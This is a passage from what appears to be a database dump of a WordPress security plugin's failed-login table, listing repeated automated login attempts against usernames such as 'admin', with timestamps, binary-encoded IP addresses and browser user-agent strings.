Chrome/89.0.4389.114 Safari/537.36'),(5017,6678,1629243413.772355,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5018,6679,1629243414.054342,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5019,6680,1629243414.284450,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5020,6681,1629243414.534223,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5021,6682,1629243414.763234,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5022,6683,1629243415.051436,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5023,6684,1629243415.330195,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5024,6685,1629243415.558390,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5025,6686,1629243415.797903,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5026,6687,1629243416.739334,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5027,6688,1629243416.977798,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5028,6689,1629243417.216621,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5029,6690,1629243417.450247,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5030,6691,1629243417.673479,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5031,6693,1629243625.027919,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5032,6694,1629243813.991104,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5033,6695,1629243815.179086,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5034,6696,1629243965.019559,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5035,6697,1629244406.833472,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5036,6698,1629244408.763488,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5037,6699,1629244613.712976,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ca�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5038,6700,1629244641.053271,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5039,6701,1629244642.446872,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5040,6702,1629244936.068969,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��U�,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5041,6703,1629245261.041409,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���X�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5042,6704,1629245582.060894,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���EAm','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5043,6705,1629245595.265716,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5044,6706,1629245598.323626,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5045,6707,1629245675.471694,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5046,6711,1629245924.612799,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"Q�n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5047,6716,1629246251.543576,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5048,6716,1629246251.580089,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5049,6717,1629246582.531026,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5050,6718,1629246928.725757,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5051,6725,1629247272.664121,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���z.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5052,6725,1629247272.683911,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���z.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5053,6728,1629247609.059318,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5054,6729,1629247933.437055,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5055,6729,1629247933.586262,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5056,6732,1629248279.323419,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#ݵ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5057,6733,1629248446.561597,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�?�','Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5058,6733,1629248446.610016,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�?�','Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5059,6736,1629248623.023580,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\>cc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5060,6743,1629248959.114503,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ֻ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5061,6748,1629249322.851030,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),(5062,6751,1629249335.788753,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5063,6752,1629249611.871078,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@rP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5064,6752,1629249611.941163,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@rP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5065,6757,1629249971.749651,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5066,6762,1629250361.120240,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5067,6763,1629250718.958541,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5068,6763,1629250719.067660,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5069,6768,1629251034.228572,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����kQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5070,6768,1629251034.270089,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����kQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5071,6769,1629251430.235383,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5072,6769,1629251430.288181,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5073,6774,1629251775.285172,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5074,6779,1629252091.942937,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�-�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5075,6784,1629252509.706897,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��u,�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5076,6785,1629252798.724359,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5077,6786,1629253201.039032,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~�+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5078,6787,1629253608.490264,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\r\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5079,6788,1629253932.720172,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g|_Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5080,6789,1629254288.678891,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����j�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5081,6790,1629255374.886055,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5082,6791,1629255614.078065,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k��\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5083,6792,1629255799.121695,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5084,6793,1629256045.027174,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Kw��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5085,6794,1629256490.106130,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5086,6795,1629256713.802324,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5087,6796,1629256908.138720,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5088,6797,1629257097.294107,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Qٌ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5089,6798,1629257301.153376,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\"ɪ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5090,6799,1629257504.771461,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g/<,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5091,6800,1629257564.900071,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5092,6801,1629257566.171671,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5093,6802,1629257566.630965,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5094,6803,1629257567.108483,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5095,6804,1629257567.434206,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5096,6805,1629257567.806127,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5097,6806,1629257570.412932,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5098,6807,1629257570.970994,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5099,6808,1629257571.266565,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5100,6809,1629257571.531691,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5101,6810,1629257571.778033,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5102,6811,1629257572.081032,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5103,6812,1629257572.386004,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5104,6813,1629257572.710871,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5105,6814,1629257572.972477,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5106,6815,1629257573.203765,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5107,6816,1629257573.447152,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5108,6817,1629257573.739903,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5109,6818,1629257574.051127,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5110,6820,1629257713.198816,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ʃ�\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5111,6821,1629257939.082230,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5112,6821,1629257939.185744,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5113,6822,1629258142.218748,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5114,6823,1629258316.593874,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@rP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5115,6824,1629258521.367396,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��1�m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5116,6825,1629258737.644356,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5117,6826,1629258923.329310,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5118,6826,1629258923.390196,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5119,6827,1629259144.507351,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3Dp^','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5120,6828,1629259322.685322,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5121,6829,1629259523.919394,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5122,6830,1629259719.264947,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g*:f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5123,6831,1629259920.997996,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��=�F�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5124,6832,1629260127.392557,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5125,6833,1629260344.987351,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���J�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5126,6834,1629260531.915766,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Kw��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5127,6835,1629260730.567915,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5128,6836,1629260931.999780,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5129,6837,1629261182.157566,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vw�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5130,6838,1629261378.737455,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����t\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5131,6839,1629261544.161526,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w`�;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5132,6840,1629261740.316637,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���EAm','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5133,6841,1629261976.627467,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z(d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5134,6842,1629262147.176130,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ŜJ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5135,6843,1629262349.349141,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5136,6844,1629262551.485567,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����C-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5137,6845,1629262754.610512,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5138,6846,1629262989.069942,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��[�|�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5139,6847,1629263161.947106,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,�7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5140,6848,1629263372.202455,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����,�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 